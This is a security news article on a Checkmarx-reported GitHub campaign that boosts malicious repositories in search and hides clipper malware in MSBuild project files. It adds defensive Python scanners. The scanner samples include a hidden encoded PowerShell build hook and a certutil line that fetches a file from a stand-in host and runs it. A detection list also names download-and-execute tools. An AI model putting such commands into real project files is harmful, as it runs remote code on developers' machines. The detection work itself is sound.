Threat actors are going to great lengths to ensure that malicious code hidden in legitimate-looking GitHub repositories is used by as many developers as possible, Checkmarx has warned.
The security vendor’s research engineer, Yehuda Gelb, described a number of techniques deployed in a recent campaign designed to ensure these repositories appear at the top of GitHub’s search results.
“Our recent findings reveal a threat actor creating GitHub repositories with names and topics that are likely to be searched by unsuspecting users,” he wrote. “These repositories are cleverly disguised as legitimate projects, often related to popular games, cheats, or tools, making it difficult for users to distinguish them from benign code.”
Gelb outlined two specific techniques being used in the campaign:
- Threat actors use GitHub Actions to automatically update their malicious repositories at high frequency with small, random changes. This artificially boosts their visibility, especially if a user filters search results by "most recently updated".
- The attackers use multiple fake accounts to add stars to their malicious repos, creating the illusion that they are highly trusted and popular. This also ensures the repos appear high up in search results when the victim filters by "most stars".
“Unsuspecting users, often drawn to the top search results and repositories with seemingly positive engagement, are more likely to click on these malicious repositories and use the code or tools they provide, unaware of the hidden dangers lurking within,” Gelb warned.
The malware itself is hidden inside the seemingly legitimate repositories, obfuscated within the .csproj or .vcxproj project files that Visual Studio uses, he continued. Those files are MSBuild XML and can carry commands that run as part of a build, so the malicious code runs automatically when the developer builds the cloned project rather than when a source file is opened and read. It first checks whether the victim's IP address is in Russia, then downloads encrypted payloads from specific URLs.
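A practical check for this hiding place is to list every build-time hook in a project file before building it. The script below is an added example, not Checkmarx's code and not from the campaign: it parses a .csproj or .vcxproj with the standard library, reports PreBuildEvent/PostBuildEvent/PreLinkEvent properties and Exec tasks (the MSBuild features that run shell commands during a build), and flags command patterns typical of download-and-execute one-liners. The two sample project files and the marker list are constructed for the demonstration; the thresholds and regexes are assumptions, not a signature set.

```python
"""Scan an MSBuild project (.csproj/.vcxproj) for build-time command hooks.

Added example; the sample project text below is constructed, not from the campaign.
"""
import base64
import re
import xml.etree.ElementTree as ET

# MSBuild elements whose content is executed by the build.
HOOK_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent", "Exec"}

# Heuristic markers (assumption: chosen for this example, not an exhaustive list).
SUSPICIOUS = {
    "encoded-command": r"(?i)-e(nc|ncodedcommand)\b",
    "hidden-window": r"(?i)-w(indowstyle)?\s+hidden",
    "remote-fetch": r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|certutil|bitsadmin",
    "eval": r"(?i)invoke-expression|\biex\b",
    "base64-blob": r"[A-Za-z0-9+/]{60,}={0,2}",
}


def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace that old-style project files carry."""
    return tag.rsplit("}", 1)[-1]


def suspicious_markers(command: str) -> list[str]:
    """Return the names of every heuristic pattern that matches the command."""
    return [name for name, pattern in SUSPICIOUS.items() if re.search(pattern, command)]


def find_build_hooks(project_xml: str) -> list[dict]:
    """List every command MSBuild would run for this project, in document order."""
    root = ET.fromstring(project_xml)
    hooks = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name not in HOOK_TAGS:
            continue
        if name == "Exec":
            command = elem.get("Command", "")
        else:
            # .csproj keeps the command as element text; .vcxproj nests a <Command> child.
            child = next((c for c in elem if _local(c.tag) == "Command"), None)
            command = (child.text if child is not None else elem.text) or ""
        command = " ".join(command.split())
        if command:
            hooks.append({"hook": name, "command": command, "flags": suspicious_markers(command)})
    return hooks


# Constructed samples. PowerShell -EncodedCommand takes base64 of UTF-16LE text,
# so the blob below decodes to a harmless Write-Host, not a real payload.
ENCODED = base64.b64encode(
    "Write-Host 'constructed sample, not a real payload'".encode("utf-16le")
).decode()

SAMPLE_CSPROJ = f"""<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
  </PropertyGroup>
  <PropertyGroup>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)bin\\"</PostBuildEvent>
  </PropertyGroup>
  <Target Name="Prep" BeforeTargets="Build">
    <Exec Command="powershell -w hidden -enc {ENCODED}" />
  </Target>
</Project>
"""

SAMPLE_VCXPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>cmd /c certutil -urlcache -split -f http://example.invalid/p.bin p.bin &amp;&amp; p.bin</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
</Project>
"""


def scan(project_xml: str) -> list[dict]:
    """Only the hooks that tripped at least one marker."""
    return [h for h in find_build_hooks(project_xml) if h["flags"]]


if __name__ == "__main__":
    for fname, text in (("sample.csproj", SAMPLE_CSPROJ), ("sample.vcxproj", SAMPLE_VCXPROJ)):
        for h in find_build_hooks(text):
            status = "SUSPICIOUS " + ",".join(h["flags"]) if h["flags"] else "ok"
            print(f"{fname}: {h['hook']}: {status}: {h['command'][:80]}")
```

Run it against a real clone (`find_build_hooks(open(path).read())`) before opening the solution in Visual Studio; an unflagged hook still deserves a read, since the list above is only a starting set of markers.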
According to the report, this particular campaign was designed to spread crypto-wallet clipper malware used to steal victims’ cryptocurrency – although the same techniques could theoretically be used to spread other malicious code.
Gelb urged GitHub users to keep a close eye on the commit frequency of repos on the platform and on whether those commits introduce only minor changes. He added that stars coming from accounts that were all created at around the same time should be treated as another red flag.
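Both red flags can be scored from data GitHub already exposes: per-commit timestamps and line counts (the commits endpoint plus each commit's stats) and the creation date of every stargazer's account (the stargazers endpoint plus each user profile). The code below is an added example, not Checkmarx's tooling, and runs on constructed sample data rather than live API calls. It measures commits per day together with the share of tiny commits, and the largest share of stargazer accounts created inside any seven-day window; the thresholds are assumptions chosen for illustration.

```python
"""Heuristics for the two GitHub search-poisoning red flags. Added example with constructed data."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class RepoSignals:
    commit_times: list[datetime]          # author timestamp of each commit
    commit_sizes: list[int]               # lines added + deleted per commit
    star_account_created: list[datetime]  # created_at of each stargazer's account


def commit_churn(times: list[datetime], sizes: list[int], tiny: int = 5) -> tuple[float, float]:
    """Return (commits per day over the observed span, fraction of commits touching <= `tiny` lines)."""
    if len(times) < 2:
        return 0.0, 0.0
    span_days = max((max(times) - min(times)).total_seconds() / 86400, 1.0)
    per_day = len(times) / span_days
    tiny_frac = sum(1 for s in sizes if s <= tiny) / len(sizes)
    return per_day, tiny_frac


def star_burst(created: list[datetime], window_days: int = 7) -> float:
    """Largest fraction of stargazer accounts created within any `window_days` window.

    Sliding window over sorted creation dates: a batch of sock-puppet accounts
    registered together scores near 1.0; organically accumulated stars score low.
    """
    if not created:
        return 0.0
    c = sorted(created)
    window = timedelta(days=window_days)
    best, j = 0, 0
    for i in range(len(c)):
        while c[i] - c[j] > window:
            j += 1
        best = max(best, i - j + 1)
    return best / len(c)


def assess(sig: RepoSignals, per_day_max: float = 3.0, tiny_max: float = 0.6,
           burst_max: float = 0.5) -> list[str]:
    """Return the red flags raised for a repository (thresholds are assumptions)."""
    flags = []
    per_day, tiny = commit_churn(sig.commit_times, sig.commit_sizes)
    if per_day > per_day_max and tiny > tiny_max:
        flags.append("high-frequency trivial commits")
    if star_burst(sig.star_account_created) > burst_max:
        flags.append("stars from accounts created together")
    return flags


# Constructed samples (not real repositories).
BASE = datetime(2024, 4, 1)

# A poisoned repo: a commit every 3 hours changing 1-2 lines, 30 stars from
# accounts all registered within the same hour.
POISONED = RepoSignals(
    commit_times=[BASE + timedelta(hours=3 * i) for i in range(40)],
    commit_sizes=[1, 2] * 20,
    star_account_created=[BASE - timedelta(days=10, minutes=-i) for i in range(30)],
)

# A benign repo: a commit every 5 days with varied sizes, stars from accounts
# registered roughly a month apart over several years.
BENIGN = RepoSignals(
    commit_times=[BASE + timedelta(days=5 * i) for i in range(12)],
    commit_sizes=[40, 3, 120, 8, 15, 60, 2, 200, 35, 9, 70, 12],
    star_account_created=[BASE - timedelta(days=30 * i) for i in range(30)],
)


if __name__ == "__main__":
    for name, sig in (("poisoned", POISONED), ("benign", BENIGN)):
        per_day, tiny = commit_churn(sig.commit_times, sig.commit_sizes)
        print(f"{name}: {per_day:.1f} commits/day, {tiny:.0%} tiny, "
              f"star burst {star_burst(sig.star_account_created):.0%}, flags={assess(sig)}")
```

Neither signal is proof on its own (a bot that bumps a version file daily is not malware, and a repo that trends on social media legitimately gains a burst of stars), so treat the flags as a reason to read the project files and the commit diffs before building anything.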